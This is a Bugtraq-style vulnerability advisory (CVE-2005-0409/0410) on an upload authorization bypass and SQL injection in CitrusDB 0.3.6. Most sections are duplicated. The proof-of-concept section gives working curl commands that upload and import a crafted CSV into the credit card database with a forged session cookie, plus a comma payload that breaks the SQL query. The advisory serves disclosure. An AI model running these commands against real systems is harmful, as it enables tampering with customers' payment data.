CitrusDB CSV File Upload Access Validation Vulnerability
BID:12557
Info
CitrusDB CSV File Upload Access Validation Vulnerability
| Bugtraq ID: | 12557 |
| Class: | Access Validation Error |
| CVE: |
CVE-2005-0409 CVE-2005-0410 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 15 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | Discovery of this vulnerability is credited to RedTeam. |
| Vulnerable: |
CitrusDB Customer Database 0.3.6 |
| Not Vulnerable: | |
Discussion
CitrusDB CSV File Upload Access Validation Vulnerability
CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import.
These issues are reported to affect CitrusDB 0.3.6; earlier versions may also be affected.
CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import.
These issues are reported to affect CitrusDB 0.3.6; earlier versions may also be affected.
Exploit / POC
CitrusDB CSV File Upload Access Validation Vulnerability
No exploit is required.
The following proof of concept is available:
This uploads the file exploit.csv.
curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form
[email protected] --form Import=Import
This imports the file to the credit card database:
curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor"
"http://<target>/citrusdb/tools/index.php?load=importcc&submit=on"
Note: The above proof of concepts require the id_hash of an existing user.
THe following proof of concept demonstrates the SQL injection vulnerability:
Reportedly supplying ',,,,, as the contents of the uploaded csv file will make the SQL query in './citrusdb/tools/importcc.php' fail.
No exploit is required.
The following proof of concept is available:
This uploads the file exploit.csv.
curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form
[email protected] --form Import=Import
This imports the file to the credit card database:
curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b;
user_name=testor"
"http://<target>/citrusdb/tools/index.php?load=importcc&submit=on"
Note: The above proof of concepts require the id_hash of an existing user.
THe following proof of concept demonstrates the SQL injection vulnerability:
Reportedly supplying ',,,,, as the contents of the uploaded csv file will make the SQL query in './citrusdb/tools/importcc.php' fail.
Solution / Fix
CitrusDB CSV File Upload Access Validation Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
CitrusDB CSV File Upload Access Validation Vulnerability
References:
References:
- CitrusDB Customer Database Home Page (CitrusDB)
- SQL-Injection in CitrusDB (RedTeam)
- Upload Authorization bypass in CitrusDB (RedTeam)